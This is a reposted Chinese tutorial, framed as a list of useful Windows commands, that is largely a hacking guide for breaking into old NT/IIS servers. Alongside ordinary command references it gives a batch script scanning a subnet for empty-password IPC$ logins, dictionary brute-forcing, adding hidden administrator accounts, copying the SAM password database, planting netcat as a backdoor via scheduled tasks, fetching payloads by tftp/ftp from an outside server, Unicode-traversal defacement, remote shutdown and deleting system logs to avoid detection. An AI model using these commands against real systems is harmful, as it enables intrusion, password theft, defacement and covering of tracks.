积累系统性知识
积聚技术精华
  首页    个人中心    撰写积文    建立课题    订立目标    整理积文    管理课题    管理目标    技能Get    代码积累 
Windows一些实用命令
error997 (error997)    2014-11-20 20:26:20      目标    课题
   at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止  
at id号 /delete 停止某个已注册的计划任务  
at 查看所有的计划任务  
切换到: 纯代码  
   
at //ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机  

finger username @host 查看最近有哪些用户登陆  
telnet ip 端口 远和登陆服务器,默认端口为23  
open ip 连接到IP(属telnet登陆后的命令)  
telnet 在本机上直接键入telnet 将进入本机的telnet  
copy 路径/文件名1 路径/文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件  
copy c:/srv.exe $">//ip/admin$ 复制本地c:/srv.exe到对方的admin下  
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件  
copy $/svv.exe">//ip/admin$/svv.exe c:/ 或:copy//ip/admin$/*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:  
xcopy 要复制的文件或目录树 目标地址/目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件  
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:/server.exe 登陆后,将“IP”的server.exe下载到目标主机c:/server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送  
tftp -i 对方IP put c:/server.exe 登陆后,上传本地c:/server.exe至主机  
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)  
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface  
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息  
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令  
mem 查看cpu使用情况  
attrib 文件名(目录名) 查看某文件(目录)的属性  
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性  
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间  
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间  
set 指定环境变量名称=要指派给变量的字符 设置环境变量  
set 显示当前所有的环境变量  
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量  
pause 暂停批处理程序,并显示出:请按任意键继续....  
if 在批处理程序中执行条件处理(更多说明见if命令及变量)  
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)  
call 路径/批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)  
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)  
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置  
echo 信息 在屏幕上显示出信息  
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中  
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello  
find 文件名 查找某文件  
title 标题名字 更改CMD窗口标题名字  
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白  

  bin 或 image 设定以二进制方式传送文件  
bell 每完成一次文件传送,报警提示  
cdup 返回上一级目录  
close 中断与远程服务器的ftp会话(与open对应)  
open host[port] 建立指定ftp服务器连接,可指定连接端口  
delete 删除远端主机中的文件  
mdelete [remote-files] 删除一批文件  
mkdir directory-name 在远端主机中建立目录  
rename [from] [to] 改变远端主机中的文件名  
rmdir directory-name 删除远端主机中的目录  
status 显示当前FTP的状态  
system 显示远端主机系统类型  
user user-name [password] [account] 重新以别的用户名登录远端主机  
open host [port] 重新建立一个新的连接  
prompt 交互提示模式  
macdef 定义宏命令  
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录  
chmod 改变远端主机的文件权限  
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母  
cd remote-dir 进入远程主机目录  
cdup 进入远程主机目录的父目录  
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip  

MYSQL 命令:  
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。  
(例:mysql -h110.110.110.110 -Uroot -P123456  
注:u与root可以不用加空格,其它也一样)  
exit 退出MYSQL  
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码  
grant select on 数据库.* to 用户名@登录主机 identified by /"密码/"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)  
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。  
use mysql;  
show tables; 显示库中的数据表  
describe 表名; 显示数据表的结构  
create database 库名; 建库  
use 库名;  
create table 表名 (字段设定列表); 建表  
drop database 库名;  
drop table 表名; 删库和删表  
delete from 表名; 将表中记录清空  
select * from 表名; 显示表中的记录  
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的//mysql//bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。  
win2003系统下新增命令(实用部份):  
shutdown /参数 关闭或重启本地或远程主机。  
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。  
例:shutdown /r /t 0 立即重启本地主机(无延时)  
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。  
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。  
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。  
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。  

Linux系统下基本命令: 要区分大小写  
uname 显示版本信息(同win2K的 ver)  
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)  
pwd 查询当前所在的目录位置  
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。  
cat 文件名 查看文件内容  
cat >abc.txt 往abc.txt文件中写上内容。  
more 文件名 以一页一页的方式显示一个文本文件。  
cp 复制文件  
mv 移动文件  
rm 文件名 删除文件,rm -a 目录名删除目录及子目录   
mkdir 目录名 建立目录  
rmdir 删除子目录,目录内没有文档。  
chmod 设定档案或目录的存取权限  
grep 在档案中查找字符串  
diff 档案文件比较  
find 档案搜寻  
date 现在的日期、时间  
who 查询目前和你使用同一台机器的人以及Login时间地点  
w 查询目前上机者的详细资料  
whoami 查看自己的帐号名称  
groups 查看某人的Group  
passwd 更改密码  
history 查看自己下过的命令  
ps 显示进程状态  
kill 停止某进程  
gcc 黑客通常用它来编译C语言写的文件  
su 权限转换为指定使用者  
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。  
ftp ftp连接上某服务器(同win2K)  

附:批处理命令与变量  

1:for命令及变量 基本格式:  
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。  
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use $">//ip/ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3  

(set):指定一个或一组文件,可使用通配符,如:(D:/user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}  

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开  
command_parameters:为特定命令指定参数或命令行开关  

IN (set):指在(set)中取值;DO command :指执行command  

参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:/pass.txt)时}。  
用法举例:  
@echo off  
echo 用法格式:test.bat *.*.* > test.txt  

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use //%1.%%G /user:administrator | find "命令成功完成" >>test.txt  
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。  

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。  
@echo off  
echo 用法格式:ok.bat ip  
FOR /F %%i IN (D:/user.dic) DO smb.exe %1 %%i D:/pass.dic 200  
存为:ok.exe 说明:输入一个IP后,用字典文件d:/pass.dic来暴解d:/user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
   net use $">//ip/ipc$ " " /user:" " 建立IPC空链接    
net use $">//ip/ipc$ "密码" /user:"用户名" 建立IPC非空链接    
net use h: $">//ip/c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:    
net use h: $">//ip/c$ 登陆后映射对方C:到本地为H:    
net use $">//ip/ipc$ /del 删除IPC链接    
net use h: /del 删除映射对方到本地的为H:的映射    
net user 用户名 密码 /add 建立用户    
net user guest /active:yes 激活guest用户    
net user 查看有哪些用户    
net user 帐户名 查看帐户的属性    
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数    
net start 查看开启了哪些服务    
net start 服务名  开启服务;(如:net start telnet, net start schedule)    
net stop 服务名 停止某服务    
net time //目标ip 查看对方时间    
net time //目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息    
net view 查看本地局域网内开启了哪些共享    
net view //ip 查看对方局域网内开启了哪些共享    
net config 显示系统网络设置    
net logoff 断开连接的共享    
net pause 服务名 暂停某服务    
net send ip "文本信息" 向对方发信息    
net ver 局域网内正在使用的网络连接类型和信息    
net share 查看本地开启的共享    
net share ipc$ 开启ipc$共享    
net share ipc$ /del 删除ipc$共享    
net share c$ /del 删除C:共享    
net user guest 12345 用guest用户登陆后用将密码改为12345    
net password 密码 更改系统登陆密码    
netstat -a 查看开启了哪些端口,常用netstat -an    
netstat -n 查看端口的网络连接情况,常用netstat -an    
netstat -v 查看正在进行的工作    
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)    
netstat -s 查看正在使用的所有协议使用情况    
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写    
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。    
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。    
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)    
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息    
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件    

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)    
move 盘符/路径/要移动的文件名 存放移动文件的路径/移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖    
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令    
at id号 开启已注册的某个计划任务
   1、NET 

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 


net use //127.0.0.1/ipc$ 123456 /user:hbx
 

退出的命令是 


net use //127.0.0.1/ipc$ /delte
 

下面的操作你必须登陆后才可以用,登陆的方法就在上面。 

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户。我们加一个heibai的用户密码为lovechina 


net user heibai lovechina /add
 


只要显示命令成功,那么我们可以把他加入Administrator组了。 

net localgroup Administrators heibai /add
 

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了。我们这里把对方的C盘映射到本地的Z盘, 


net use z://127.0.0.1/c$
            net start telnet
 


这样可以打开对方的TELNET服务。 
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的Windows2000就是删除不了它。 

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! 


net user guest lovechina
 

net命令果然强大啊! 

2、At 

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?那么需要用AT命令,这里假设你已经登陆了那个服务器。你首先要得到对方的时间, 


net time //127.0.0.1
 


将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 

at //127.0.0.1 12:3 nc.exe
 

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上。 

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名。它是一个TELNET服务,端口为99。等到了12:3就可以连接到对方的99端口,这样就给对方种下了木马。 

3、Telnet 

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口。 


telnet 127.0.0.1 99
 


这样就可以连到对方的99端口,那你就可以在对方运行命令了,这个也就是肉鸡。 
4、FTP 

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个www.51.NET,不错的。当我们申请完后,它会给用户名,密码,以及FTP服务器。在上传前需要登陆先,这里我们假设FTP服务器是www.51.NET,用户名是HUCJS,密码是654321。 
 


他会要求输入用户,成功后会要求输入密码。 
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:/下,传到对方D:/ 


get c:/index.htm d:/
 

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 


put c:/index.htm d:/
 

5、Copy 

下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 


copy index.htm //127.0.0.1/c$/index.htm
 

如果你要复制到D盘下把C改为D,就行了! 

如果你要把他复制到WINNT目录里,就要把输入 


copy index.htm //127.0.0.1/admin$/index.htm
            admin$是winnt
 


要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:/winnt/repair/sam._ sam._是数据库的文件名。下面就把127.0.0.1的数据库复制到本地C盘下 

copy //127.0.0.1/admin$/repair/sam._ c:/
 

6、Set 

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!下面是我得到的结果!我来分析它,只是找主页在那而已。 


COMPUTERNAME=PENTIUMII
            ComSpec=D:/WINNT/system32/cmd.exe
            CONTENT_LENGTH=0
            GATEWAY_INTERFACE=CGI/1.1
            HTTP_ACCEPT=*/*
切换到: 纯代码  
   
            HTTP_ACCEPT_LANGUAGE=zh-cn
            HTTP_CONNECTION=Keep-Alive

            HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
            HTTP_ACCEPT_ENCODING=gzip, deflate
切换到: 纯代码  
   
            HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
            NUMBER_OF_PROCESSORS=1
            Os2LibPath=D:/WINNT/system32/os2/dll;
            OS=Windows_NT
            Path=D:/WINNT/system32;D:/WINNT
            PATHEXT=.COM;.EXE;.BAT;.CMD

            PATH_TRANSLATED=E:/vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地
            址。这里是E:/vlroot
切换到: 纯代码  
   
            PROCESSOR_ARCHITECTURE=x86

            PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
切换到: 纯代码  
   
            PROCESSOR_LEVEL=6
            PROCESSOR_REVISION=0303

            PROMPT=$P$G
切换到: 纯代码  
   
            QUERY_STRING=/c+set
            REMOTE_ADDR=XX.XX.XX.XX
            REMOTE_HOST=XX.XX.XX.XX
            REQUEST_METHOD=GET
            SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
            SERVER_NAME=XX.XX.XX.XX
            SERVER_PORT=80
            SERVER_PORT_SECURE=0
            SERVER_PROTOCOL=HTTP/1.1

            SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
切换到: 纯代码  
   
            SystemDrive=D:
            SystemRoot=D:/WINNT
            TZ=GMT-9
            USERPROFILE=D:/WINNT/Profiles/Default User
            windir=D:/WINNT
 

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。 

切换到: 纯代码  
   
7、Nbtstat 

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧! 

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。命令是 


切换到: 纯代码  
   
nbtstat -A XX.XX.XX.XX
 

-A一定要大写哦,下面是得到的结果。 


切换到: 纯代码  
   
NetBIOS Remote Machine Name Table
            Name Type Status

            ---------------------------------------------
切换到: 纯代码  
   
            Registered Registered Registered Registered Registered Registered Registered Reg
            istered Registered Registered Registered
            MAC Address = 00-E0-29-14-35-BA
            PENTIUMII <00> UNIQUE
            PENTIUMII <20> UNIQUE
            ORAHOTOWN <00> GROUP
            ORAHOTOWN <1C> GROUP
            ORAHOTOWN <1B> UNIQUE
            PENTIUMII <03> UNIQUE
            INet~Services <1C> GROUP
            IS~PENTIUMII...<00> UNIQUE
            ORAHOTOWN <1E> GROUP
            ORAHOTOWN <1D> UNIQUE
            ..__MSBROWSE__.<01> GROUP
 

粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户,这里的用户是PENTIUMII。 

切换到: 纯代码  
   
8、Shutdown 

关了对方的NT服务器的命令 


切换到: 纯代码  
   
Shutdown //IP地址 t:20
 

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。 

切换到: 纯代码  
   
9、DIR 

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。你可以本地试下。 

10、Echo 

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。我们假设我们要把“南京大屠杀铁证如山,任何***人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。 


echo 南京大屠杀铁证如山,任何***人不得抵赖!>index.htm
            echo 南京大屠杀铁证如山,任何***人不得抵赖!>>index.htm
 

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何***人不得抵赖!”写进index.htm;第二个的意思是把“南京大屠杀铁证如山,任何***人不得抵赖!”加到index.htm里面。 

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。大家可以本地试下。 

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。 

(1)首先,我们需要申请一个免费的主页空间。 

(2)用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。) 


open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
            cnhack(你申请时的用户名)
            test(你申请时的密码)
切换到: 纯代码  
   
            get index.htm c:/inetpub/wwwroot/index.htm

            (这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
            bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
 

具体的做法: 


输入 echo open upload.chinaren.com> c:/cnhack.txt
            输入 echo cnhack >> c:/cnhack.txt
            输入 echo 39abs >> c:/cnhack.txt
            输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
 

最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)等命令完成时,文件已经下载到你指定的文件里了。 

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。) 记得要 del c:/cnhack.txt。 

11、Attrib 

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。不过有这个命令就别怕了。 


切换到: 纯代码  
   
attrib -r index.htm
 

这个命令是把index.htm的只读属性去掉。如果把“-”改为“+”则是把这个文件的属性设置为只读。 


切换到: 纯代码  
   
attrib +r index.htm
 

这个命令是把index.htm的属性设置为只读。 

12、Del 

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗,呵呵。NT的日志有这些 


切换到: 纯代码  
   
del C:/winnt/system32/logfiles/.*
            del C:/winnt/ssytem32/config/.evt
            del C:/winnt/system32/dtclog/.*
            del C:/winnt/system32/.log
            del C:/winnt/system32/.txt
            del C:/winnt/.txt
            del C:/winnt/.log
 

只要删除这些就可以了,有些系统NT安装在D盘或其他盘,就要把C改成其他盘。

转自 http://blog.csdn.net/y___y/article/details/1534878
(+0)技能Get

建议楼主:搜索关键字 |参考其他资源 |回复 |追问
  error997(error997):   个人中心    课题    目标    代码积累